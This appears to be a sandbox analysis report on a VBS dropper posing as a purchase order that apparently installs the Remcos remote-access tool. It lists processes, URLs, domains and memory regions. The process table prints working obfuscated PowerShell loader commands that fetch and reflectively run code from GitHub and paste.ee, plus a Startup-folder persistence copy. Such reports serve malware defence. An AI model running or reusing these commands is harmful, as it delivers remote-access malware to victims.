Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Purchase Order - PO14895.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0hlav5g.lh0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lehcme0q.gxj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lh0x5tnr.cak.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3hpztb5.1fc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqlgpeui.ral.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqp0qdea.nuh.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order - PO14895.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase
Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
sbv.orierocretse.vbs')')
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName
+ ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+'
WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+'
W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+'
WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V,
02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+'
02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe
'02V',[CHaR]34))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/5vQgr/0
|
188.114.96.3
|
|
|
|
ab9001.ddns.net
|
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.108.133
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://raw.githubusercont
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtYQD;
|
unknown
|
There are 24 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.96.3
|
|
|
|
ab9001.ddns.net
|
45.133.172.96
|
|
|
|
raw.githubusercontent.com
|
185.199.108.133
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
45.133.172.96
|
ab9001.ddns.net
|
United Kingdom
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
185.199.108.133
|
raw.githubusercontent.com
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\chrorne-9OH0YR
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\chrorne-9OH0YR
|
licence
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
A18000
|
heap
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
262E000
|
stack
|
page read and write
|
|
|
|
1B056132000
|
trusted library allocation
|
page read and write
|
|
|
|
1B0571DA000
|
trusted library allocation
|
page read and write
|
|
|
|
23549330000
|
heap
|
page read and write
|
||
|
1B05E4A0000
|
heap
|
page read and write
|
||
|
246F38A7000
|
heap
|
page read and write
|
||
|
1CE815B1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886CB0000
|
trusted library allocation
|
page read and write
|
||
|
1CE816D3000
|
trusted library allocation
|
page read and write
|
||
|
2354B5A8000
|
heap
|
page read and write
|
||
|
9DA91FB000
|
stack
|
page read and write
|
||
|
1B05E4CE000
|
heap
|
page read and write
|
||
|
2354B29A000
|
heap
|
page read and write
|
||
|
47293DE000
|
stack
|
page read and write
|
||
|
4729979000
|
stack
|
page read and write
|
||
|
2354B297000
|
heap
|
page read and write
|
||
|
2354B5FE000
|
heap
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
1B044480000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E90000
|
trusted library allocation
|
page read and write
|
||
|
246F3570000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
23549380000
|
heap
|
page read and write
|
||
|
246F1915000
|
heap
|
page read and write
|
||
|
F9C3DB8000
|
stack
|
page read and write
|
||
|
1B0464E9000
|
trusted library allocation
|
page read and write
|
||
|
1CE81450000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
2354B49D000
|
heap
|
page read and write
|
||
|
1B05E354000
|
heap
|
page read and write
|
||
|
246F18D0000
|
heap
|
page read and write
|
||
|
1B05E50A000
|
heap
|
page read and write
|
||
|
1CE99CF0000
|
heap
|
page read and write
|
||
|
1CE99709000
|
heap
|
page read and write
|
||
|
1B047DB7000
|
trusted library allocation
|
page read and write
|
||
|
246F37D0000
|
heap
|
page read and write
|
||
|
7FF886CC2000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
2354B358000
|
heap
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
472977C000
|
stack
|
page read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page read and write
|
||
|
2354B37D000
|
heap
|
page read and write
|
||
|
23549300000
|
heap
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B23000
|
trusted library allocation
|
page execute and read and write
|
||
|
2354B391000
|
heap
|
page read and write
|
||
|
2354B320000
|
heap
|
page read and write
|
||
|
2468045F000
|
trusted library allocation
|
page read and write
|
||
|
1B045C90000
|
heap
|
page execute and read and write
|
||
|
4729B7F000
|
stack
|
page read and write
|
||
|
246800F5000
|
trusted library allocation
|
page read and write
|
||
|
2354B59A000
|
heap
|
page read and write
|
||
|
2354B242000
|
heap
|
page read and write
|
||
|
2354B348000
|
heap
|
page read and write
|
||
|
7FF886BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2354B49B000
|
heap
|
page read and write
|
||
|
1B04613B000
|
trusted library allocation
|
page read and write
|
||
|
2468060E000
|
trusted library allocation
|
page read and write
|
||
|
F9C36D2000
|
stack
|
page read and write
|
||
|
5C6000
|
heap
|
page read and write
|
||
|
9DA8FF8000
|
stack
|
page read and write
|
||
|
1CEFEEC6000
|
heap
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
1B0560D1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BC0000
|
trusted library allocation
|
page read and write
|
||
|
2354B277000
|
heap
|
page read and write
|
||
|
2354B396000
|
heap
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
2354B299000
|
heap
|
page read and write
|
||
|
4729313000
|
stack
|
page read and write
|
||
|
246F389D000
|
heap
|
page read and write
|
||
|
1CEFEECC000
|
heap
|
page read and write
|
||
|
4729A7C000
|
stack
|
page read and write
|
||
|
24680105000
|
trusted library allocation
|
page read and write
|
||
|
2354B5C0000
|
heap
|
page read and write
|
||
|
7FF886B24000
|
trusted library allocation
|
page read and write
|
||
|
1CE81D76000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
2354B232000
|
heap
|
page read and write
|
||
|
2354B49B000
|
heap
|
page read and write
|
||
|
1B047DBB000
|
trusted library allocation
|
page read and write
|
||
|
F9C3EB9000
|
stack
|
page read and write
|
||
|
9DA8CFE000
|
stack
|
page read and write
|
||
|
24680045000
|
trusted library allocation
|
page read and write
|
||
|
246F3926000
|
heap
|
page execute and read and write
|
||
|
1CEFF420000
|
heap
|
page read and write
|
||
|
1B045CD2000
|
trusted library allocation
|
page read and write
|
||
|
1B044470000
|
heap
|
page readonly
|
||
|
246800EF000
|
trusted library allocation
|
page read and write
|
||
|
2354B257000
|
heap
|
page read and write
|
||
|
24680534000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
27DC000
|
stack
|
page read and write
|
||
|
1CEFF4F5000
|
heap
|
page read and write
|
||
|
2354B267000
|
heap
|
page read and write
|
||
|
F9C3A7E000
|
stack
|
page read and write
|
||
|
246F198E000
|
heap
|
page read and write
|
||
|
9DA8C7D000
|
stack
|
page read and write
|
||
|
1CE81E3C000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BCC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CE81A56000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
2354B222000
|
heap
|
page read and write
|
||
|
1CE81619000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
246F3832000
|
heap
|
page read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
1B046601000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B23000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CE81B62000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
1B05E290000
|
heap
|
page read and write
|
||
|
F9C3F3E000
|
stack
|
page read and write
|
||
|
9DA87EE000
|
stack
|
page read and write
|
||
|
246F3220000
|
heap
|
page read and write
|
||
|
1B04662C000
|
trusted library allocation
|
page read and write
|
||
|
1CEFEF40000
|
heap
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
2354B5FE000
|
heap
|
page read and write
|
||
|
2354B498000
|
heap
|
page read and write
|
||
|
1B05E514000
|
heap
|
page read and write
|
||
|
7FF886D02000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C06000
|
trusted library allocation
|
page execute and read and write
|
||
|
2354B36D000
|
heap
|
page read and write
|
||
|
7FF886B1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
23549387000
|
heap
|
page read and write
|
||
|
2354B272000
|
heap
|
page read and write
|
||
|
1CE999A0000
|
heap
|
page read and write
|
||
|
2354B272000
|
heap
|
page read and write
|
||
|
1B05E34D000
|
heap
|
page read and write
|
||
|
246F18B0000
|
heap
|
page read and write
|
||
|
2354B339000
|
heap
|
page read and write
|
||
|
246F3AB4000
|
heap
|
page read and write
|
||
|
1CE8164B000
|
trusted library allocation
|
page read and write
|
||
|
2354B368000
|
heap
|
page read and write
|
||
|
7FF886C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B045CA0000
|
trusted library allocation
|
page read and write
|
||
|
246F38F0000
|
heap
|
page execute and read and write
|
||
|
1CE915C0000
|
trusted library allocation
|
page read and write
|
||
|
1B04702C000
|
trusted library allocation
|
page read and write
|
||
|
F9C3E39000
|
stack
|
page read and write
|
||
|
311F000
|
stack
|
page read and write
|
||
|
9DA8BFE000
|
stack
|
page read and write
|
||
|
246F3770000
|
heap
|
page read and write
|
||
|
9DA9BCE000
|
stack
|
page read and write
|
||
|
2354B49B000
|
heap
|
page read and write
|
||
|
45724F5000
|
stack
|
page read and write
|
||
|
246800FB000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
1B05E250000
|
heap
|
page execute and read and write
|
||
|
2354B4A0000
|
heap
|
page read and write
|
||
|
1CE99734000
|
heap
|
page read and write
|
||
|
1B044400000
|
heap
|
page read and write
|
||
|
1B045CD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
235493B5000
|
heap
|
page read and write
|
||
|
1B044460000
|
trusted library allocation
|
page read and write
|
||
|
23549438000
|
heap
|
page read and write
|
||
|
2354B262000
|
heap
|
page read and write
|
||
|
2354B221000
|
heap
|
page read and write
|
||
|
2354B299000
|
heap
|
page read and write
|
||
|
2354B4C6000
|
heap
|
page read and write
|
||
|
1CE81C42000
|
trusted library allocation
|
page read and write
|
||
|
2354ADE0000
|
heap
|
page read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
24680604000
|
trusted library allocation
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
F9C3AFD000
|
stack
|
page read and write
|
||
|
24690071000
|
trusted library allocation
|
page read and write
|
||
|
2354B495000
|
heap
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
246F1959000
|
heap
|
page read and write
|
||
|
2354B4A1000
|
heap
|
page read and write
|
||
|
2354B521000
|
heap
|
page read and write
|
||
|
246F1A4B000
|
heap
|
page read and write
|
||
|
24680102000
|
trusted library allocation
|
page read and write
|
||
|
2354B28E000
|
heap
|
page read and write
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
235493AB000
|
heap
|
page read and write
|
||
|
1B05E37E000
|
heap
|
page read and write
|
||
|
1CEFEE40000
|
heap
|
page read and write
|
||
|
1B045D60000
|
heap
|
page read and write
|
||
|
23549310000
|
heap
|
page read and write
|
||
|
2354B4A8000
|
heap
|
page read and write
|
||
|
1CE814D0000
|
heap
|
page read and write
|
||
|
45725FE000
|
stack
|
page read and write
|
||
|
2EDE000
|
stack
|
page read and write
|
||
|
2354B365000
|
heap
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
2354B5FA000
|
heap
|
page read and write
|
||
|
2354B5F8000
|
heap
|
page read and write
|
||
|
246F3E30000
|
heap
|
page read and write
|
||
|
2354B4A0000
|
heap
|
page read and write
|
||
|
9DA8B7E000
|
stack
|
page read and write
|
||
|
1CE816C2000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
9DA917E000
|
stack
|
page read and write
|
||
|
2354B321000
|
heap
|
page read and write
|
||
|
2354B378000
|
heap
|
page read and write
|
||
|
1CE816B9000
|
trusted library allocation
|
page read and write
|
||
|
1B05E3C0000
|
heap
|
page read and write
|
||
|
7FF886B30000
|
trusted library allocation
|
page read and write
|
||
|
2354B22B000
|
heap
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
1B045D76000
|
heap
|
page read and write
|
||
|
2354B220000
|
heap
|
page read and write
|
||
|
1B047A30000
|
trusted library allocation
|
page read and write
|
||
|
2630000
|
heap
|
page read and write
|
||
|
1CEFF020000
|
heap
|
page read and write
|
||
|
246F3AB0000
|
heap
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
246F1910000
|
heap
|
page read and write
|
||
|
1B04432E000
|
heap
|
page read and write
|
||
|
1B0477A2000
|
trusted library allocation
|
page read and write
|
||
|
F9C3BFE000
|
stack
|
page read and write
|
||
|
246F1963000
|
heap
|
page read and write
|
||
|
1B05E4EB000
|
heap
|
page read and write
|
||
|
1CEFEE9E000
|
heap
|
page read and write
|
||
|
7FF886CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0479E6000
|
trusted library allocation
|
page read and write
|
||
|
252E000
|
stack
|
page read and write
|
||
|
472939E000
|
stack
|
page read and write
|
||
|
7DF4CAC90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0442A0000
|
heap
|
page read and write
|
||
|
1B0566DB000
|
trusted library allocation
|
page read and write
|
||
|
23549465000
|
heap
|
page read and write
|
||
|
54C000
|
stack
|
page read and write
|
||
|
1B0560C1000
|
trusted library allocation
|
page read and write
|
||
|
2354B272000
|
heap
|
page read and write
|
||
|
24680085000
|
trusted library allocation
|
page read and write
|
||
|
4572EFB000
|
stack
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
246F19AE000
|
heap
|
page read and write
|
||
|
7FF886B20000
|
trusted library allocation
|
page read and write
|
||
|
1CE81AB4000
|
trusted library allocation
|
page read and write
|
||
|
1CE81430000
|
trusted library allocation
|
page read and write
|
||
|
45726FE000
|
stack
|
page read and write
|
||
|
7FF886ECB000
|
trusted library allocation
|
page read and write
|
||
|
2FDF000
|
stack
|
page read and write
|
||
|
1B05E33B000
|
heap
|
page read and write
|
||
|
1CE81B00000
|
trusted library allocation
|
page read and write
|
||
|
24680012000
|
trusted library allocation
|
page read and write
|
||
|
2354B299000
|
heap
|
page read and write
|
||
|
246F3842000
|
heap
|
page read and write
|
||
|
1CE816C5000
|
trusted library allocation
|
page read and write
|
||
|
246804C6000
|
trusted library allocation
|
page read and write
|
||
|
1CE816BC000
|
trusted library allocation
|
page read and write
|
||
|
1CE8170F000
|
trusted library allocation
|
page read and write
|
||
|
1CE998C0000
|
heap
|
page read and write
|
||
|
7FF886B12000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E70000
|
trusted library allocation
|
page read and write
|
||
|
2354B398000
|
heap
|
page read and write
|
||
|
7FF886BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886CDA000
|
trusted library allocation
|
page read and write
|
||
|
1CE99728000
|
heap
|
page read and write
|
||
|
1CE81460000
|
heap
|
page readonly
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
47297FE000
|
stack
|
page read and write
|
||
|
2354B5BE000
|
heap
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
1B05E2EF000
|
heap
|
page read and write
|
||
|
1B05E54B000
|
heap
|
page read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CD1000
|
trusted library allocation
|
page read and write
|
||
|
9DA9CCD000
|
stack
|
page read and write
|
||
|
24690010000
|
trusted library allocation
|
page read and write
|
||
|
23549456000
|
heap
|
page read and write
|
||
|
235493AE000
|
heap
|
page read and write
|
||
|
2354B388000
|
heap
|
page read and write
|
||
|
1CE91622000
|
trusted library allocation
|
page read and write
|
||
|
23549460000
|
heap
|
page read and write
|
||
|
246F3580000
|
heap
|
page readonly
|
||
|
2354B325000
|
heap
|
page read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page read and write
|
||
|
246F17D0000
|
heap
|
page read and write
|
||
|
1CE997E0000
|
heap
|
page execute and read and write
|
||
|
1CE815A0000
|
heap
|
page execute and read and write
|
||
|
2354B6D9000
|
heap
|
page read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
1B0570DB000
|
trusted library allocation
|
page read and write
|
||
|
2354B35D000
|
heap
|
page read and write
|
||
|
1CE816CD000
|
trusted library allocation
|
page read and write
|
||
|
2354B34D000
|
heap
|
page read and write
|
||
|
1B05E2AB000
|
heap
|
page read and write
|
||
|
2354B4A0000
|
heap
|
page read and write
|
||
|
7FF886DA2000
|
trusted library allocation
|
page read and write
|
||
|
246800F2000
|
trusted library allocation
|
page read and write
|
||
|
246F3877000
|
heap
|
page read and write
|
||
|
7FF886C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CEFEE84000
|
heap
|
page read and write
|
||
|
2354B4AA000
|
heap
|
page read and write
|
||
|
2354B5C6000
|
heap
|
page read and write
|
||
|
1B047A6E000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D52000
|
trusted library allocation
|
page read and write
|
||
|
1CEFEE8C000
|
heap
|
page read and write
|
||
|
28DF000
|
stack
|
page read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page read and write
|
||
|
A10000
|
heap
|
page read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
F9C37DF000
|
stack
|
page read and write
|
||
|
246F3920000
|
heap
|
page execute and read and write
|
||
|
2354B5AF000
|
heap
|
page read and write
|
||
|
7FF886CC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886ED0000
|
trusted library allocation
|
page read and write
|
||
|
1CE815CB000
|
trusted library allocation
|
page read and write
|
||
|
1B0477CC000
|
trusted library allocation
|
page read and write
|
||
|
1B05E286000
|
heap
|
page execute and read and write
|
||
|
1CE99820000
|
heap
|
page execute and read and write
|
||
|
246F3899000
|
heap
|
page read and write
|
||
|
246F1990000
|
heap
|
page read and write
